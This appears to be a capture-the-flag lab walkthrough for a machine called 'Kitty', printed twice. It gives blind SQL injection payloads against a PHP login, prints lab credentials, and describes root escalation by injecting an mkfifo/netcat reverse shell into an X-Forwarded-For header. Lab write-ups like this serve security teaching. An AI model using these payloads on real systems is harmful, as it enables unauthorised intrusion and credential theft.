Kitty

Enumeration

Nmap scan:

Nmap scan report for kitty.thm (10.10.251.255)
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b0:c5:69:e6:dd:6b:81:0c:da:32:be:41:e3:5b:97:87 (RSA)
|   256 6c:65:ad:87:08:7a:3e:4c:7d:ea:3a:30:76:4d:04:16 (ECDSA)
|_  256 2d:57:1d:56:f6:56:52:29:ea:aa:da:33:b2:77:2c:9c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

There is a Login page login.php:

There is also a register page register.php:

We can see that the tech stack used is PHP + Apache 2.4.41 + Ubuntu.

Probably the database engine is MySQL!

If we try to register a new user with username test and password test we receive the following error:

Password must have atleast 6 characters!

Creating an account test:testtest and login we came to welcome.php:

Try to register another user with name test:

We receive a HTTP 200 status code response with message "This username is already taken".

Instead if we use a correct username (test) but a bad password like in login form we obtain always HTTP 200 status code response with message "Invalid username or password":

Try to enumerate some hidden directories and files:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u "http://kitty.thm/FUZZ" -ic -fc 403 -t 300 -e .php

Exploit Blind SQL injection

Intercept the Login HTTP request in BurpSuite:

If we try a simple SQL injection like ' OR 1=1 ; -- #

in order to exploit a SQL statement like this one we obtain an error message about SQL injection attempt:

select username,password from users where username = 'test' and password = '' OR 1=1; --#test';

If we try to inject SQL on username field we have instead a success:

select username,password from users where username = 'test'-- #' and password = 'test';

Now we can try to inject some SQL code, starting from UNION attacks and using the response code 302 returned when login is successfull.

First enumerate the number of columns requested with original SELECT by variably incrementing the number of NULL columns in order to spot the original columns requested (4 is the correct number of null to use!):

select ?,?,username,password from users where username = '' UNION SELECT null,null-- -' and password = 'test';

So we have a Blind SQL Injection and we need to retrieve information from database only using the HTTP response code.

Try to enumerate the database name using SQL function SUBSTRING() and built-in MySQL function database() :

username=' UNION SELECT null,null,null,null WHERE substring(database(),1,1) > 'a'-- -&password=password

By asking the DB engine if the first character of the database name in use is greater than the character 'a' the response code is 302. If, on the other hand, we set the condition to be less than the character 'a' i.e., a nonprintable ASCII character, the response code becomes 200:

The payload to use to enumerate each character of database() function output is this one:

We must use a Cluster Bomb type attack since the index of the substring() function will have to be incremented only after comparing the corresponding character with all possible printable ASCII characters. For example we will have queries executed in this order:

... substring(database(),1,1) = 'a' ...

... substring(database(),1,1) = 'b' ...

.

... substring(database(),1,1) = 'z' ...

And then I increment the index:

... substring(database(),2,1) = 'a' ...

... substring(database(),2,1) = 'b' ...

.

... substring(database(),2,1) = 'z' ...

The first payload set (index):

The second payload set (character):

The attack work in the way explained above:

Filter using only 302 response code:

As we can see, the name of the extracted database turns out to be MYWEBSITE ormywebsite. Both forms in BurpSuite turn out to be valid because the comparison operations in MySQL, such as those used in WHERE clauses, are typically case insensitive by default, depending on the collation used for the column or database. To avoid false positives in the output, it is necessary to use the keyword BINARY:

username=' UNION SELECT null,null,null,null WHERE BINARY substring(database(),1,1) > 'a'-- -&password=password

Database name: mywebsite

Try to enumerate the user using user() function:

Username: kitty

Try to enumerate the table name:

username=' UNION SELECT null,null,null,table_name FROM information_schema.tables WHERE table_schema not in ('information_schema', 'mysql', 'performance_schema', 'sys') and substring(table_name,§1§,1) = '§a§'-- -&password=password

Filter as always for only 302 response code:

In this case we only have the table name in lower case since table names in MySQL are case sensitive!

table name: siteusers

Try to enumerate the columns name using the following payload:



username=' UNION SELECT null,null,null,column_name FROM information_schema.columns WHERE table_schema not in ('information_schema','mysql','performance_schema','sys') and table_name='siteusers' and substring(column_name,§1§,1) = '§u§';-- -&password=password

In this case we only have the column name in lower and upper case since column names in MySQL are case IN-sensitive!

At the cost of making testing manual (one solution might be to use Python) we enumerate the first character first and then increment the substring length:

The second character for the targeted column is 'r':

and so on...

The resulting columns name are:

created_at
id
username
passwords

Enumerate the password of user kitty previously discovered:

username=' UNION SELECT null,null,null,password FROM siteusers WHERE username='kitty' and substring(password,§1§,1) = '§changeme§';-- -&password=password

As we can see we've a problem here because function SUBSTRING() is CASE INSENSITIVE so both upper and lower case return 302 Response code.

We need to use BINARY keyword:

password of kitty: L0ng_Liv3_KittY

Connect to machine using ssh and get user flag:

Privilege Escalation

Some manual searching & enumeration on file system:

<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'kitty');
define('DB_PASSWORD', 'Sup3rAwesOm3Cat!');
define('DB_NAME', 'mywebsite');

/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($mysqli === false){
        die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>

Connect to mysql locally using these credentials:

index.php

<?php
// Initialize the session
session_start();

// Check if the user is already logged in, if yes then redirect him to welcome page
if(isset($_SESSION["loggedin"]) && $_SESSION["loggedin"] === true){
    header("location: welcome.php");
    exit;
}

include('config.php');
$username = $_POST['username'];
$password = $_POST['password'];
// SQLMap 
$evilwords = ["/sleep/i", "/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "/ifnull/i", "/ or /i"];
foreach ($evilwords as $evilword) {
        if (preg_match( $evilword, $username )) {
                echo 'SQL Injection detected. This incident will be logged!';
                die();
        } elseif (preg_match( $evilword, $password )) {
                echo 'SQL Injection detected. This incident will be logged!';
                die();
        }
}


$sql = "select * from siteusers where username = '$username' and password = '$password';";  
$result = mysqli_query($mysqli, $sql);  
$row = mysqli_fetch_array($result, MYSQLI_ASSOC);  
$count = mysqli_num_rows($result);
if($count == 1){
        // Password is correct, so start a new session
        session_start();

        // Store data in session variables
        $_SESSION["loggedin"] = true;
        $_SESSION["username"] = $username;
        // Redirect user to welcome page
        header("location: welcome.php");
} elseif ($username == ""){
        $login_err = "";
} else{
        // Password is not valid, display a generic error message
        $login_err = "Invalid username or password";
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>User Login</h2>
        <p>Please fill in your credentials to login.</p>

<?php 
if(!empty($login_err)){
        echo '<div class="alert alert-danger">' . $login_err . '</div>';
}        
?>

        <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control">
            </div>    
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control">
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
        </form>
    </div>
</body>
</html>

Notice that there are 2 different directories development and html:

the only file that differs between the two folders is this logged that is empty.

If we inspect the socket opens with ss:

We see that there is a listen socket on port 8080 that's not reachable from external machines. We need to establish an SSH tunnel to this port, since we can’t just access it externally:

ssh kitty@kitty.thm -L 8081:localhost:8080

The site seems to work exactly like the first one.

Try to search under other directories...like /opt for example:

If we can write inside the logged file, it will be used as the source of the $ip input and we can try to break the command "echo $ip..." and get a shell as root.

There is no cronjob but presumably this script is executed by the root user. Let's check using pspy64, by copying it on victim machine and analyze the processes:

Every minute this script is executed by user root (UID=0).

The problem here is that only www-data can write to this file:

Seeing the development code, we note that:

There are defined patterns that triggers Apache to write the IP passed with HTTP Header X-Forwarded-For.

Note that this portion of code there isn't in website currently running on port 80:

Force the write of IP address by triggering some of these patterns using OR keyword for example:

But as we can see, the client doesn't send automatically the X-Forwarded-For HTTP header, so we need to modify with BurpSuite the request like this one, using 1.1.1.1 as test for our privilege escalation:

And finally here we can see that IP is written to the logged file:

The command execution to evade is this:

/usr/bin/sh -c "echo $ip >> /root/logged"

We can test it on our Kali machine and see the result. The ls -la need to be substitute with the command to spawn a reverse shell:

/usr/bin/sh -c "echo ok;ls -la;echo ok >> /tmp/logged"

The command that we want to obtain is like this one:

/usr/bin/sh -c "echo ok;nc -c sh 10.8.61.24 7777;echo ok >> /tmp/logged"

On the victim machine there is netcat:

But there isn't the option -c:

So we need to change the payload as this one:

X-Forwarded-For: ok;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.61.24 7777 >/tmp/f;echo ok

To reach this result we need to send IP formatted as below:

On victim machine we obtain the payload reflected inside logged file:

We put the Kali listen on port 7777:

PreviousHTTP Request Smuggling NextHijack

Last updated 1 year ago

Kitty

Enumeration

Nmap scan:

Nmap scan report for kitty.thm (10.10.251.255)
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b0:c5:69:e6:dd:6b:81:0c:da:32:be:41:e3:5b:97:87 (RSA)
|   256 6c:65:ad:87:08:7a:3e:4c:7d:ea:3a:30:76:4d:04:16 (ECDSA)
|_  256 2d:57:1d:56:f6:56:52:29:ea:aa:da:33:b2:77:2c:9c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

There is a Login page login.php:

There is also a register page register.php:

We can see that the tech stack used is PHP + Apache 2.4.41 + Ubuntu.

Probably the database engine is MySQL!

If we try to register a new user with username test and password test we receive the following error:

Password must have atleast 6 characters!

Creating an account test:testtest and login we came to welcome.php:

Try to register another user with name test:

We receive a HTTP 200 status code response with message "This username is already taken".

Instead if we use a correct username (test) but a bad password like in login form we obtain always HTTP 200 status code response with message "Invalid username or password":

Try to enumerate some hidden directories and files:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u "http://kitty.thm/FUZZ" -ic -fc 403 -t 300 -e .php

Exploit Blind SQL injection

Intercept the Login HTTP request in BurpSuite:

If we try a simple SQL injection like ' OR 1=1 ; -- #

in order to exploit a SQL statement like this one we obtain an error message about SQL injection attempt:

select username,password from users where username = 'test' and password = '' OR 1=1; --#test';

If we try to inject SQL on username field we have instead a success:

select username,password from users where username = 'test'-- #' and password = 'test';

Now we can try to inject some SQL code, starting from UNION attacks and using the response code 302 returned when login is successfull.

select ?,?,username,password from users where username = '' UNION SELECT null,null-- -' and password = 'test';

So we have a Blind SQL Injection and we need to retrieve information from database only using the HTTP response code.

Try to enumerate the database name using SQL function SUBSTRING() and built-in MySQL function database() :

username=' UNION SELECT null,null,null,null WHERE substring(database(),1,1) > 'a'-- -&password=password

The payload to use to enumerate each character of database() function output is this one:

... substring(database(),1,1) = 'a' ...

... substring(database(),1,1) = 'b' ...

.

... substring(database(),1,1) = 'z' ...

And then I increment the index:

... substring(database(),2,1) = 'a' ...

... substring(database(),2,1) = 'b' ...

.

... substring(database(),2,1) = 'z' ...

The first payload set (index):

The second payload set (character):

The attack work in the way explained above:

Filter using only 302 response code:

username=' UNION SELECT null,null,null,null WHERE BINARY substring(database(),1,1) > 'a'-- -&password=password

Database name: mywebsite

Try to enumerate the user using user() function:

Username: kitty

Try to enumerate the table name:

username=' UNION SELECT null,null,null,table_name FROM information_schema.tables WHERE table_schema not in ('information_schema', 'mysql', 'performance_schema', 'sys') and substring(table_name,§1§,1) = '§a§'-- -&password=password

Filter as always for only 302 response code:

In this case we only have the table name in lower case since table names in MySQL are case sensitive!

table name: siteusers

Try to enumerate the columns name using the following payload:



username=' UNION SELECT null,null,null,column_name FROM information_schema.columns WHERE table_schema not in ('information_schema','mysql','performance_schema','sys') and table_name='siteusers' and substring(column_name,§1§,1) = '§u§';-- -&password=password

In this case we only have the column name in lower and upper case since column names in MySQL are case IN-sensitive!

But using the Cluster bomb attack due to the fact that there are 4 columns, names result mixed in the attack result

At the cost of making testing manual (one solution might be to use Python) we enumerate the first character first and then increment the substring length:

The second character for the targeted column is 'r':

and so on...

The resulting columns name are:

created_at
id
username
passwords

Enumerate the password of user kitty previously discovered:

username=' UNION SELECT null,null,null,password FROM siteusers WHERE username='kitty' and substring(password,§1§,1) = '§changeme§';-- -&password=password

As we can see we've a problem here because function SUBSTRING() is CASE INSENSITIVE so both upper and lower case return 302 Response code.

We need to use BINARY keyword:

password of kitty: L0ng_Liv3_KittY

Connect to machine using ssh and get user flag:

Privilege Escalation

Some manual searching & enumeration on file system:

<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'kitty');
define('DB_PASSWORD', 'Sup3rAwesOm3Cat!');
define('DB_NAME', 'mywebsite');

/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($mysqli === false){
        die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>

Connect to mysql locally using these credentials:

index.php

<?php
// Initialize the session
session_start();

// Check if the user is already logged in, if yes then redirect him to welcome page
if(isset($_SESSION["loggedin"]) && $_SESSION["loggedin"] === true){
    header("location: welcome.php");
    exit;
}

include('config.php');
$username = $_POST['username'];
$password = $_POST['password'];
// SQLMap 
$evilwords = ["/sleep/i", "/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "/ifnull/i", "/ or /i"];
foreach ($evilwords as $evilword) {
        if (preg_match( $evilword, $username )) {
                echo 'SQL Injection detected. This incident will be logged!';
                die();
        } elseif (preg_match( $evilword, $password )) {
                echo 'SQL Injection detected. This incident will be logged!';
                die();
        }
}


$sql = "select * from siteusers where username = '$username' and password = '$password';";  
$result = mysqli_query($mysqli, $sql);  
$row = mysqli_fetch_array($result, MYSQLI_ASSOC);  
$count = mysqli_num_rows($result);
if($count == 1){
        // Password is correct, so start a new session
        session_start();

        // Store data in session variables
        $_SESSION["loggedin"] = true;
        $_SESSION["username"] = $username;
        // Redirect user to welcome page
        header("location: welcome.php");
} elseif ($username == ""){
        $login_err = "";
} else{
        // Password is not valid, display a generic error message
        $login_err = "Invalid username or password";
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>User Login</h2>
        <p>Please fill in your credentials to login.</p>

<?php 
if(!empty($login_err)){
        echo '<div class="alert alert-danger">' . $login_err . '</div>';
}        
?>

        <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control">
            </div>    
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control">
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
        </form>
    </div>
</body>
</html>

Notice that there are 2 different directories development and html:

the only file that differs between the two folders is this logged that is empty.

If we inspect the socket opens with ss:

We see that there is a listen socket on port 8080 that's not reachable from external machines. We need to establish an SSH tunnel to this port, since we can’t just access it externally:

ssh kitty@kitty.thm -L 8081:localhost:8080

The site seems to work exactly like the first one.

Try to search under other directories...like /opt for example:

If we can write inside the logged file, it will be used as the source of the $ip input and we can try to break the command "echo $ip..." and get a shell as root.

There is no cronjob but presumably this script is executed by the root user. Let's check using pspy64, by copying it on victim machine and analyze the processes:

Every minute this script is executed by user root (UID=0).

The problem here is that only www-data can write to this file:

Seeing the development code, we note that:

There are defined patterns that triggers Apache to write the IP passed with HTTP Header X-Forwarded-For.

Note that this portion of code there isn't in website currently running on port 80:

Force the write of IP address by triggering some of these patterns using OR keyword for example:

And finally here we can see that IP is written to the logged file:

The command execution to evade is this:

/usr/bin/sh -c "echo $ip >> /root/logged"

We can test it on our Kali machine and see the result. The ls -la need to be substitute with the command to spawn a reverse shell:

/usr/bin/sh -c "echo ok;ls -la;echo ok >> /tmp/logged"

The command that we want to obtain is like this one:

/usr/bin/sh -c "echo ok;nc -c sh 10.8.61.24 7777;echo ok >> /tmp/logged"

On the victim machine there is netcat:

But there isn't the option -c:

So we need to change the payload as this one:

X-Forwarded-For: ok;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.61.24 7777 >/tmp/f;echo ok

To reach this result we need to send IP formatted as below:

On victim machine we obtain the payload reflected inside logged file:

We put the Kali listen on port 7777:

Enjoy the root!

PreviousHTTP Request Smuggling NextHijack

Last updated 1 year ago